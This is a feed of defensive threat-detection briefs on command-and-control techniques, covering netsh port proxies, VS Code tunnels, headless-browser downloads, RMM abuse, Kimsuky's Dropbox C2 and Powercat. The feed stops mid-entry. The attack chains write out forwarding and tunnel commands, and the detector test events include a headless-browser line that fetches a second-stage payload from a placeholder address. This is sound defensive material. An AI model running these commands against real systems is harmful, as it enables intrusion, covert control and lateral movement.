{"description":"Trending threats, MITRE ATT\u0026CK coverage, and detection metadata — refreshed continuously.","feed_url":"https://feed.craftedsignal.io/tags/command-and-control/","home_page_url":"https://feed.craftedsignal.io/","items":[{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Elastic Defend","Sysmon Registry Events","Microsoft Defender XDR","SentinelOne Cloud Funnel"],"_cs_severities":["medium"],"_cs_tags":["port-forwarding","registry-modification","command-and-control","defense-evasion","windows"],"_cs_type":"advisory","_cs_vendors":["Elastic","Microsoft","SentinelOne","Crowdstrike"],"content_html":"\u003cp\u003eAttackers may configure port forwarding rules to bypass network segmentation restrictions, effectively using the compromised host as a jump box to reach systems that are not directly routable from their current position. Windows implements this through the port proxy feature of \u003ccode\u003enetsh\u003c/code\u003e, which stores its rules in the registry: whether the attacker runs \u003ccode\u003enetsh interface portproxy add\u003c/code\u003e or writes the key directly, the result is a registry change that redirects incoming TCP connections from a local port to another port on the same host or on a remote computer. The technique is typically employed post-compromise to facilitate lateral movement and maintain unauthorized access within the network. 
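\u003c/p\u003e
\u003cp\u003eAs an added example (not code from the brief, from Elastic or from the Sigma rule it references), the Python below applies the \u003ccode\u003e*ControlSet*\u003c/code\u003e pattern to Sysmon Event ID 13 (RegistryEvent, value set) records and decodes the listen and connect endpoints from the value that \u003ccode\u003enetsh\u003c/code\u003e writes. The events, image paths and addresses are constructed for the example.\u003c/p\u003e

```python
# Added example (not from the brief): match Sysmon Event ID 13 registry
# value-set records against the PortProxy pattern and decode the rule.
# All events below are constructed for illustration.
import fnmatch

# Sigma-style pattern from the brief. '*ControlSet*' covers CurrentControlSet
# as well as the numbered ControlSet001/ControlSet002 views of the same hive.
PORTPROXY_PATTERN = 'HKLM\\SYSTEM\\*ControlSet*\\Services\\PortProxy\\v4tov4\\*'


def is_portproxy_write(event):
    '''True for a Sysmon value-set event whose target is under the PortProxy key.'''
    if event.get('EventID') != 13:
        return False
    target = event.get('TargetObject', '')
    # Sigma matching is case-insensitive and Sysmon renders the hive as
    # 'HKLM\\System\\...'; fnmatch.fnmatch is only case-insensitive on Windows,
    # so normalise both sides explicitly and use the case-sensitive variant.
    return fnmatch.fnmatchcase(target.lower(), PORTPROXY_PATTERN.lower())


def parse_portproxy_rule(event):
    '''Recover the forwarding rule from the value name and its REG_SZ data.

    netsh stores each v4tov4 rule under the 'tcp' subkey as a value named
    'listenaddress/listenport' whose data is 'connectaddress/connectport'.
    '''
    value_name = event['TargetObject'].rsplit('\\', 1)[-1]
    listen_addr, listen_port = value_name.split('/', 1)
    connect_addr, connect_port = event['Details'].split('/', 1)
    return {
        'image': event.get('Image', ''),
        'listen_addr': listen_addr,
        'listen_port': listen_port,
        'connect_addr': connect_addr,
        'connect_port': connect_port,
    }


def find_portproxy_rules(events):
    '''Return the decoded rule for every matching event, in input order.'''
    return [parse_portproxy_rule(e) for e in events if is_portproxy_write(e)]


# Constructed events. The first mirrors what
# 'netsh interface portproxy add v4tov4 listenport=4444 listenaddress=0.0.0.0
#  connectport=3389 connectaddress=10.0.0.5' leaves in the registry; the second
# is a rule written directly with reg.exe under a numbered control set; the
# third is an unrelated value set under the TCP/IP parameters and must not match.
SAMPLE_EVENTS = [
    {'EventID': 13, 'Image': 'C:\\Windows\\System32\\netsh.exe',
     'TargetObject': 'HKLM\\System\\CurrentControlSet\\Services\\PortProxy\\v4tov4\\tcp\\0.0.0.0/4444',
     'Details': '10.0.0.5/3389'},
    {'EventID': 13, 'Image': 'C:\\Windows\\System32\\reg.exe',
     'TargetObject': 'HKLM\\System\\ControlSet001\\Services\\PortProxy\\v4tov4\\tcp\\10.0.0.12/8443',
     'Details': '10.0.5.20/443'},
    {'EventID': 13, 'Image': 'C:\\Windows\\System32\\svchost.exe',
     'TargetObject': 'HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters\\Interfaces\\{a1b2c3d4-0000-4000-8000-000000000001}\\DhcpIPAddress',
     'Details': '10.0.0.12'},
]

if __name__ == '__main__':
    for rule in find_portproxy_rules(SAMPLE_EVENTS):
        print(rule)
```

\u003cp\u003eSysmon writes these events only for registry paths its configuration selects, so an empty result on a host where \u003ccode\u003enetsh interface portproxy show all\u003c/code\u003e lists rules points at a collection gap rather than at the detection logic. The decoded connect address is the internal target the attacker is reaching for, which makes it the natural pivot for the investigation.\u003c/p\u003e
\u003cp\u003e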
This activity is detected by monitoring changes to the \u003ccode\u003eHKLM\\SYSTEM\\*ControlSet*\\Services\\PortProxy\\v4tov4\\\u003c/code\u003e registry subkeys; the wildcard covers both \u003ccode\u003eCurrentControlSet\u003c/code\u003e and the numbered \u003ccode\u003eControlSet00N\u003c/code\u003e views of the same hive.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe attacker gains initial access to the target system through an exploit or compromised credentials.\u003c/li\u003e\n\u003cli\u003eThe attacker opens a command-line interface (e.g., \u003ccode\u003ecmd.exe\u003c/code\u003e or \u003ccode\u003epowershell.exe\u003c/code\u003e) with administrative privileges; writing under \u003ccode\u003eHKLM\\SYSTEM\u003c/code\u003e requires them.\u003c/li\u003e\n\u003cli\u003eThe attacker adds a rule, most commonly with \u003ccode\u003enetsh interface portproxy add v4tov4 listenport=\u0026lt;port\u0026gt; listenaddress=\u0026lt;addr\u0026gt; connectport=\u0026lt;port\u0026gt; connectaddress=\u0026lt;addr\u0026gt;\u003c/code\u003e, or writes the registry directly with \u003ccode\u003ereg.exe add\u003c/code\u003e or PowerShell\u0026rsquo;s \u003ccode\u003eSet-ItemProperty\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eEither path produces the same artifact: a REG_SZ value under \u003ccode\u003eHKLM\\SYSTEM\\CurrentControlSet\\Services\\PortProxy\\v4tov4\\tcp\u003c/code\u003e named \u003ccode\u003elistenaddress/listenport\u003c/code\u003e whose data is \u003ccode\u003econnectaddress/connectport\u003c/code\u003e (for example a value named \u003ccode\u003e0.0.0.0/4444\u003c/code\u003e with data \u003ccode\u003e10.0.0.5/3389\u003c/code\u003e). The listen address, listen port, connect address and connect port are encoded in that value name and data, not stored as separate named values.\u003c/li\u003e\n\u003cli\u003eThe attacker verifies the rule with \u003ccode\u003enetsh interface portproxy show v4tov4\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe attacker leverages the newly created port forwarding rule to tunnel traffic through the compromised host, bypassing network segmentation.\u003c/li\u003e\n\u003cli\u003eThe attacker uses the proxied connection to access internal resources and conduct further attacks, such as lateral movement or data exfiltration.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 
id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation enables attackers to bypass network segmentation restrictions, leading to unauthorized access to internal systems and data. This can facilitate lateral movement, data exfiltration, and further compromise of the network. The severity of the impact depends on the sensitivity of the accessible resources and the extent of the attacker\u0026rsquo;s lateral movement.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eEnable Sysmon registry event logging (Event IDs 12 and 13) for the \u003ccode\u003eHKLM\\SYSTEM\\*ControlSet*\\Services\\PortProxy\\v4tov4\\\u003c/code\u003e registry subkeys. Sysmon records only the registry paths its configuration selects, so the PortProxy key has to be in the RegistryEvent include list before the rule can fire.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule \u0026ldquo;Port Forwarding Rule Addition via Registry Modification\u0026rdquo; to your SIEM to detect suspicious registry modifications related to port forwarding.\u003c/li\u003e\n\u003cli\u003eInvestigate any alerts generated by the Sigma rule, focusing on the process that wrote the value (\u003ccode\u003enetsh.exe\u003c/code\u003e, \u003ccode\u003ereg.exe\u003c/code\u003e or PowerShell), its parent chain, the user account that performed the action, and the connect address, which names the internal target the attacker is reaching for.\u003c/li\u003e\n\u003cli\u003eRegularly audit existing port forwarding rules with \u003ccode\u003enetsh interface portproxy show all\u003c/code\u003e; a rule on a host with no documented forwarding role is suspect. Remove unauthorized rules with \u003ccode\u003enetsh interface portproxy delete v4tov4\u003c/code\u003e (or \u003ccode\u003enetsh interface portproxy reset\u003c/code\u003e to clear them all), then confirm the registry value is gone.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-05-04T14:17:05Z","date_published":"2026-05-04T14:17:05Z","id":"/briefs/2026-05-port-forwarding-registry/","summary":"An adversary may abuse port forwarding to bypass network segmentation restrictions by creating a new port forwarding rule through modification of the Windows registry.","title":"Windows Port Forwarding Rule Addition via Registry Modification","url":"https://feed.craftedsignal.io/briefs/2026-05-port-forwarding-registry/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Microsoft Defender XDR","Elastic Defend","Sysmon","Visual Studio 
Code"],"_cs_severities":["medium"],"_cs_tags":["command-and-control","vscode","remote-access-tools","windows"],"_cs_type":"advisory","_cs_vendors":["Microsoft","GitHub","Elastic"],"content_html":"\u003cp\u003eThis detection focuses on identifying the misuse of Visual Studio Code\u0026rsquo;s (VScode) remote tunnel feature to establish unauthorized access or control over systems. The remote tunnel feature lets developers reach a machine from vscode.dev or another VScode instance without opening an inbound port; attackers can abuse the same functionality as a ready-made remote access tool. The rule looks for execution of the VScode binary, or the standalone CLI \u003ccode\u003ecode-tunnel.exe\u003c/code\u003e, with the \u003ccode\u003etunnel\u003c/code\u003e command-line option. \u003ccode\u003ecode tunnel\u003c/code\u003e authenticates with a GitHub or Microsoft account and registers the host with Microsoft\u0026rsquo;s dev tunnel service; whoever holds that account can then open a terminal and browse the file system on the host from vscode.dev or a desktop VScode instance, which gives an attacker a command and control channel that rides on Microsoft-owned infrastructure and a Microsoft-signed binary. The rule detects this behavior by monitoring process execution and command-line arguments.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe attacker gains initial access to the target system through unspecified means.\u003c/li\u003e\n\u003cli\u003eThe attacker downloads a portable version of Visual Studio Code (VScode), or just the standalone CLI, onto the compromised system; no installation or elevated privileges are required.\u003c/li\u003e\n\u003cli\u003eThe attacker executes the binary with the \u003ccode\u003etunnel\u003c/code\u003e command-line argument to initiate a remote tunnel session.\u003c/li\u003e\n\u003cli\u003eThe attacker specifies additional arguments such as \u003ccode\u003e--accept-server-license-terms\u003c/code\u003e to suppress the license prompt, and typically \u003ccode\u003e--name\u003c/code\u003e to label the tunnel, so the command runs unattended.\u003c/li\u003e\n\u003cli\u003eThe tunnel completes a device-code login to the attacker\u0026rsquo;s GitHub or Microsoft account and registers the host with Microsoft\u0026rsquo;s dev tunnel relay; the outbound traffic is ordinary HTTPS to Microsoft endpoints, not a connection to a GitHub repository.\u003c/li\u003e\n\u003cli\u003eIf successful, the tunnel 
creates a persistent connection, allowing the attacker to execute commands and transfer files.\u003c/li\u003e\n\u003cli\u003eThe attacker uses the established tunnel to remotely access the compromised system, enabling them to perform malicious activities such as data exfiltration or lateral movement.\u003c/li\u003e\n\u003cli\u003eThe attacker maintains persistent access through the established tunnel, optionally registering it to start at boot with \u003ccode\u003ecode tunnel service install\u003c/code\u003e, allowing for long-term command and control of the compromised system.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation allows attackers to establish a persistent command and control channel, enabling them to remotely manage the compromised system. This can lead to data theft, deployment of ransomware, or further lateral movement within the network. While the number of potential victims and specific sectors targeted are not explicitly stated, the widespread use of VScode makes a wide range of organizations vulnerable.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the \u0026ldquo;Attempt to Establish VScode Remote Tunnel\u0026rdquo; rule to detect suspicious VScode tunnel activity in your environment.\u003c/li\u003e\n\u003cli\u003eEnable Sysmon process-creation logging to capture the necessary process execution data; the rule keys on the \u003ccode\u003etunnel\u003c/code\u003e argument, so command-line capture must be on.\u003c/li\u003e\n\u003cli\u003eInvestigate any alerts triggered by the rule, focusing on the command-line arguments, the account used for the device-code login, and the process behaviors to confirm malicious intent.\u003c/li\u003e\n\u003cli\u003eMonitor network connections originating from VScode processes for unusual or unauthorized connections to external servers, in particular to the dev tunnel endpoints (\u003ccode\u003e*.devtunnels.ms\u003c/code\u003e and \u003ccode\u003e*.tunnels.api.visualstudio.com\u003c/code\u003e) from hosts that have no developer role.\u003c/li\u003e\n\u003cli\u003eReview and whitelist legitimate uses of VScode\u0026rsquo;s tunnel feature by authorized developers to reduce false 
positives.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-05-04T14:17:05Z","date_published":"2026-05-04T14:17:05Z","id":"/briefs/2024-09-vscode-tunnel/","summary":"The rule detects the execution of the VScode portable binary with the tunnel command line option, potentially indicating an attempt to establish a remote tunnel session to Github or a remote VScode instance for unauthorized access and command and control.","title":"Detection of VScode Remote Tunneling for Command and Control","url":"https://feed.craftedsignal.io/briefs/2024-09-vscode-tunnel/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["high"],"_cs_tags":["command-and-control","headless-browser","file-download","windows"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eThis detection identifies potential file downloads via headless browsers on Windows systems. Attackers abuse headless browser capabilities (chrome.exe, msedge.exe, brave.exe, browser.exe, dragon.exe, vivaldi.exe) to download files, proxy traffic, and bypass application control policies. The technique leverages trusted, signed binaries to evade security restrictions, effectively using the browser as a covert download tool. The activity is characterized by a headless browser being launched from a suspicious parent process, such as a script host, Office application, or command shell, with arguments that facilitate scripted content retrieval like \u003ccode\u003e--headless*\u003c/code\u003e, \u003ccode\u003e--dump-dom\u003c/code\u003e, \u003ccode\u003e*http*\u003c/code\u003e, and \u003ccode\u003edata:text/html;base64,*\u003c/code\u003e. 
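\u003c/p\u003e
\u003cp\u003eAs an added example (not code from the brief or from the Sigma rules it refers to), the Python below evaluates Sysmon Event ID 1 (process creation) records against that pattern: a listed browser, a scripting or shell parent, \u003ccode\u003e--headless\u003c/code\u003e on the command line, and at least one retrieval indicator. The parent list and all events are constructed assumptions for the example.\u003c/p\u003e

```python
# Added example (not from the brief): evaluate Sysmon Event ID 1 (process
# creation) records against the headless-browser download pattern. The parent
# list is an assumption for the example; the events are constructed.

BROWSERS = ('chrome.exe', 'msedge.exe', 'brave.exe', 'browser.exe',
            'dragon.exe', 'vivaldi.exe')

# Script hosts, shells and Office applications. A browser spawned from these
# with headless flags is the behaviour the brief describes; a build agent
# running Puppeteer from node.exe is the usual false positive and is left out.
SUSPICIOUS_PARENTS = ('cmd.exe', 'powershell.exe', 'pwsh.exe', 'wscript.exe',
                      'cscript.exe', 'mshta.exe', 'winword.exe', 'excel.exe',
                      'outlook.exe', 'rundll32.exe')

# Sigma-style indicators from the brief. '--headless' is required; at least
# one retrieval indicator must also be present ('http' also covers https).
RETRIEVAL_INDICATORS = ('--dump-dom', 'http', 'data:text/html;base64,')


def basename(path):
    '''Last path component, lower-cased, for either slash style.'''
    return path.replace('/', '\\').rsplit('\\', 1)[-1].lower()


def headless_download_reason(event):
    '''Return a short reason string when the event matches, else None.'''
    image = basename(event.get('Image', ''))
    parent = basename(event.get('ParentImage', ''))
    cmdline = event.get('CommandLine', '').lower()
    if image not in BROWSERS or parent not in SUSPICIOUS_PARENTS:
        return None
    # '--headless*' in the brief: '--headless' alone, '--headless=new', etc.
    if '--headless' not in cmdline:
        return None
    matched = [i for i in RETRIEVAL_INDICATORS if i in cmdline]
    if not matched:
        return None
    return '%s spawned headless %s with %s' % (parent, image, ', '.join(matched))


def find_headless_downloads(events):
    '''All (reason, event) pairs for matching events, in input order.'''
    hits = []
    for e in events:
        reason = headless_download_reason(e)
        if reason is not None:
            hits.append((reason, e))
    return hits


# Constructed events. 198.51.100.7 is a documentation address; the base64
# payload decodes to a script tag.
SAMPLE_EVENTS = [
    {'ParentImage': 'C:\\Windows\\System32\\wscript.exe',
     'Image': 'C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe',
     'CommandLine': 'chrome.exe --headless --dump-dom http://198.51.100.7/stage2.txt'},
    {'ParentImage': 'C:\\Windows\\System32\\cmd.exe',
     'Image': 'C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe',
     'CommandLine': 'msedge.exe --headless=new data:text/html;base64,PHNjcmlwdD4='},
    {'ParentImage': 'C:\\Program Files\\nodejs\\node.exe',
     'Image': 'C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe',
     'CommandLine': 'chrome.exe --headless --dump-dom http://localhost:3000/'},
    {'ParentImage': 'C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe',
     'Image': 'C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe',
     'CommandLine': 'chrome.exe https://intranet.corp.example/'},
]

if __name__ == '__main__':
    for reason, _ in find_headless_downloads(SAMPLE_EVENTS):
        print(reason)
```

\u003cp\u003eThe third event shows the main tuning problem: build agents drive Chrome headless through Puppeteer or Playwright from \u003ccode\u003enode.exe\u003c/code\u003e with the same flags, so the parent list, not the browser flags, is what separates automation from abuse. Keep it to script hosts, shells and Office processes and put developer tooling in an exclusion rather than widening the indicator list.\u003c/p\u003e
\u003cp\u003e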
Defenders should monitor for such anomalous browser behavior to identify and prevent malicious file downloads.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eA user unknowingly executes a malicious script or document (e.g., via phishing or drive-by download).\u003c/li\u003e\n\u003cli\u003eThe script (e.g., PowerShell, VBScript) or document macro initiates a process, such as cmd.exe or powershell.exe.\u003c/li\u003e\n\u003cli\u003eThe parent process spawns a headless browser instance (chrome.exe, msedge.exe, etc.) with the \u003ccode\u003e--headless\u003c/code\u003e argument, so no window appears to the user.\u003c/li\u003e\n\u003cli\u003eAdditional arguments are passed to the headless browser to specify a URL for download or base64 encoded content (\u003ccode\u003e--dump-dom *http*\u003c/code\u003e, \u003ccode\u003edata:text/html;base64,*\u003c/code\u003e).\u003c/li\u003e\n\u003cli\u003eThe headless browser retrieves the content from the specified URL, or renders the inline \u003ccode\u003edata:\u003c/code\u003e URL, which lets the script feed the browser HTML and JavaScript without any network request.\u003c/li\u003e\n\u003cli\u003eWith \u003ccode\u003e--dump-dom\u003c/code\u003e the browser does not save a file itself: it writes the rendered DOM to standard output, and the calling script redirects that output to a file, usually in a user-writable directory, or parses it in memory.\u003c/li\u003e\n\u003cli\u003eThe initial script or document executes the downloaded file or uses it for further malicious activities.\u003c/li\u003e\n\u003cli\u003eThe attacker achieves their objective, such as establishing persistence, exfiltrating data, or deploying ransomware.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation can lead to arbitrary code execution, data compromise, and system compromise. Attackers can use this technique to download malware, bypass security controls, and establish a foothold in the compromised system. 
The impact can range from individual workstation compromise to large-scale network infiltration, depending on the attacker\u0026rsquo;s objectives and the privileges of the compromised user.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the Sigma rules in this brief to your SIEM to detect suspicious headless browser activity, tuning for your environment.\u003c/li\u003e\n\u003cli\u003eEnable process creation logging and command-line auditing to capture the necessary data for the Sigma rules.\u003c/li\u003e\n\u003cli\u003eInvestigate alerts generated by the Sigma rules, focusing on the parent process, browser arguments, and downloaded file artifacts.\u003c/li\u003e\n\u003cli\u003eReview and harden application control policies to restrict the execution of headless browsers from suspicious parent processes.\u003c/li\u003e\n\u003cli\u003eMonitor network connections from headless browsers to identify potential command and control traffic or data exfiltration attempts.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-06T15:34:19Z","date_published":"2026-04-06T15:34:19Z","id":"/briefs/2026-06-headless-browser-download/","summary":"Detects the execution of headless browsers from suspicious parent processes with arguments indicative of scripted retrieval, bypassing application control policies and restrictions on direct download tools.","title":"Potential File Download via a Headless Browser","url":"https://feed.craftedsignal.io/briefs/2026-06-headless-browser-download/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["medium"],"_cs_tags":["rmm","command-and-control","windows"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eThis brief focuses on the abuse of legitimate Remote Monitoring and Management (RMM) software by threat actors. 
RMM tools are often used for legitimate IT administration but can be leveraged for malicious purposes such as command and control, persistence, and lateral movement within a compromised network. This activity is identified by detecting DNS queries to a list of known RMM service domains originating from processes that are not typical web browsers. This behavior indicates that an RMM client, script, or other non-browser application is attempting to communicate with an RMM service. The detection rule was published on 2026-03-23 by Elastic and aims to surface unauthorized or malicious use of RMM tools within an organization. The organization\u0026rsquo;s sanctioned RMM product will trigger it too, so the rule is a hunting signal for RMM families that have no business on a given host rather than a blocking control; separating legitimate from malicious use depends on the context of each query, above all which process issued it.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn attacker gains initial access to a Windows system through an unknown method.\u003c/li\u003e\n\u003cli\u003eThe attacker installs or deploys a legitimate RMM tool or a modified version.\u003c/li\u003e\n\u003cli\u003eThe agent is enrolled in an account or tenant the attacker controls, so the vendor\u0026rsquo;s own relay infrastructure becomes the command and control path; self-hosted RMM products point at attacker-run servers instead.\u003c/li\u003e\n\u003cli\u003eA non-browser process (e.g., a script or a standalone executable) initiates a DNS query to resolve an RMM domain (e.g., teamviewer.com, anydesk.com).\u003c/li\u003e\n\u003cli\u003eThe name resolves and the agent connects outbound to the RMM service or attacker-controlled server, which brokers the attacker\u0026rsquo;s session; because the connection is outbound, no inbound firewall rule on the victim is needed.\u003c/li\u003e\n\u003cli\u003eThe attacker leverages the RMM tool to execute commands, transfer files, and maintain persistent access to the compromised system.\u003c/li\u003e\n\u003cli\u003eThe attacker performs lateral movement to other systems within the network, utilizing the RMM tool for remote administration.\u003c/li\u003e\n\u003cli\u003eThe attacker achieves their objective, such as data exfiltration or ransomware deployment, using the established 
RMM connection.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eCompromise via RMM tools can lead to significant damage, including unauthorized access to sensitive data, disruption of business operations, and potential ransomware attacks. Successful exploitation allows attackers to maintain persistent access and control over affected systems, facilitating lateral movement and further malicious activities. The widespread use of RMM tools in various sectors makes this a broad threat. The impact can range from a single compromised workstation to the complete takeover of an organization\u0026rsquo;s IT infrastructure.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the provided Sigma rule to your SIEM to detect DNS queries to RMM domains from non-browser processes and tune for your environment.\u003c/li\u003e\n\u003cli\u003eReview the IOC list of RMM domains and block any unauthorized RMM services at your DNS resolver; for the RMM product you do sanction, exclude its agent\u0026rsquo;s image path from the rule rather than its domains, so that a second tool reaching the same vendor still alerts.\u003c/li\u003e\n\u003cli\u003eInvestigate any alerts generated by the Sigma rule by examining the process tree and verifying the legitimacy of the process initiating the DNS query.\u003c/li\u003e\n\u003cli\u003eImplement application control policies to restrict the execution of unauthorized RMM tools on your endpoints.\u003c/li\u003e\n\u003cli\u003eEnable Sysmon DNS query logging (Event ID 22) to activate the rules above; it records the image of the process that issued the query, which is the field the browser exclusion depends on, and the DnsQuery section of the Sysmon configuration must not filter out the RMM domains.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-03-24T12:00:00Z","date_published":"2026-03-24T12:00:00Z","id":"/briefs/2026-03-rmm-domain-dns/","summary":"Detection of DNS queries to known remote monitoring and management (RMM) domains originating from non-browser processes on Windows systems indicates potential abuse of legitimate software for command and control.","title":"DNS Queries to RMM Domains from Non-Browser 
Processes","url":"https://feed.craftedsignal.io/briefs/2026-03-rmm-domain-dns/"},{"_cs_actors":["Kimsuky","Black Banshee","Velvet Chollima","Emerald Sleet","Thallium"],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["high"],"_cs_tags":["kimsuky","dropbox","api","command-and-control","exfiltration"],"_cs_type":"threat","_cs_vendors":[],"content_html":"\u003cp\u003eKimsuky, a North Korean APT group, has been observed utilizing malware that leverages the Dropbox API for command and control (C2). Because the traffic is HTTPS to Dropbox\u0026rsquo;s own API hosts (\u003ccode\u003eapi.dropboxapi.com\u003c/code\u003e and \u003ccode\u003econtent.dropboxapi.com\u003c/code\u003e), it blends in with legitimate use of the service and cannot be told apart by destination alone; the observable is which process is talking to those hosts. The malware uses the Dropbox API to upload stolen data and download commands from the attackers. This method provides a covert channel for exfiltration and control that bypasses destination-based network controls. The group has been known to target South Korean entities, but the scope of targeting may extend beyond this region. This technique has been observed starting in early 2026.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eInitial access is gained through an unconfirmed vector, such as spear phishing or watering hole attacks, delivering an initial downloader.\u003c/li\u003e\n\u003cli\u003eThe downloader executes and establishes persistence, potentially by creating scheduled tasks or modifying registry keys.\u003c/li\u003e\n\u003cli\u003eThe malware authenticates to the Dropbox API with an embedded OAuth credential (Dropbox API v2 uses bearer tokens; a refresh token plus the app key and secret is enough to mint new access tokens without any interactive login).\u003c/li\u003e\n\u003cli\u003eThe malware enumerates files on the compromised system, targeting documents, credentials, and other sensitive data.\u003c/li\u003e\n\u003cli\u003eStolen data is compressed and encrypted before being uploaded to a designated Dropbox folder controlled by the attacker, using the Dropbox API.\u003c/li\u003e\n\u003cli\u003eThe malware periodically checks the attacker\u0026rsquo;s Dropbox folder for new commands, also using the 
Dropbox API.\u003c/li\u003e\n\u003cli\u003eDownloaded commands are decrypted and executed on the compromised system, enabling actions such as remote code execution or further data exfiltration.\u003c/li\u003e\n\u003cli\u003eThe cycle of data exfiltration and command execution continues, allowing the attacker to maintain persistent access and control over the compromised system.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful attacks can lead to significant data breaches, intellectual property theft, and espionage. Kimsuky\u0026rsquo;s targeting of South Korean entities suggests a focus on political and strategic intelligence gathering. The use of Dropbox as a C2 channel allows the attackers to remain undetected for extended periods, maximizing the impact of the compromise. The number of victims is currently unknown, but the potential for widespread compromise is high.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eMonitor DNS queries and TLS connections to \u003ccode\u003eapi.dropboxapi.com\u003c/code\u003e and \u003ccode\u003econtent.dropboxapi.com\u003c/code\u003e from any process other than the sanctioned Dropbox client; the API payloads are encrypted, so process context rather than content is what separates the malware from normal use (see: \u0026ldquo;Detect Suspicious Dropbox API Usage\u0026rdquo; Sigma rule).\u003c/li\u003e\n\u003cli\u003eImplement strict access controls and monitoring for Dropbox API usage within the organization.\u003c/li\u003e\n\u003cli\u003eInvestigate and block any suspicious processes attempting to access Dropbox API endpoints.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rules in this brief to your SIEM and tune for your environment.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-03-19T12:00:00Z","date_published":"2026-03-19T12:00:00Z","id":"/briefs/2026-03-kimsuky-dropbox-api/","summary":"Kimsuky is using malware that leverages the Dropbox API for command and control, enabling file exfiltration and remote code execution.","title":"Kimsuky Malware Using Dropbox API for Command and 
Control","url":"https://feed.craftedsignal.io/briefs/2026-03-kimsuky-dropbox-api/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Windows"],"_cs_severities":["medium"],"_cs_tags":["command-and-control","execution","lateral-movement","powershell"],"_cs_type":"advisory","_cs_vendors":["Microsoft"],"content_html":"\u003cp\u003ePowercat is a PowerShell script that functions similarly to the traditional Netcat utility, allowing for network communication using TCP and UDP. Attackers can use Powercat to establish reverse shells, transfer files, and perform port scanning within a compromised environment. This activity is often employed during post-exploitation phases to maintain access and propagate further into the network. Defenders should be aware of PowerShell scripts invoking Powercat, especially in environments…\u003c/p\u003e\n","date_modified":"2024-11-04T14:27:00Z","date_published":"2024-11-04T14:27:00Z","id":"/briefs/2024-11-powercat-detection/","summary":"Adversaries may leverage Powercat, a PowerShell implementation of Netcat, to establish command and control channels or perform lateral movement within a compromised network.","title":"Powercat PowerShell Implementation Detection","url":"https://feed.craftedsignal.io/briefs/2024-11-powercat-detection/"},{"_cs_actors":[],"_cs_cves":[{"cvss":10,"id":"CVE-2024-1709"},{"cvss":8.4,"id":"CVE-2024-1708"}],"_cs_exploited":false,"_cs_products":["Elastic Defend","Microsoft Defender XDR","SentinelOne Cloud Funnel","ScreenConnect"],"_cs_severities":["medium"],"_cs_tags":["command-and-control","defense-evasion","execution","persistence","screenconnect"],"_cs_type":"advisory","_cs_vendors":["Elastic"],"content_html":"\u003cp\u003eThis threat brief focuses on the detection of suspicious activities related to the ScreenConnect remote access tool. ScreenConnect is a legitimate remote support software, but adversaries can exploit it to execute unauthorized commands on compromised systems. 
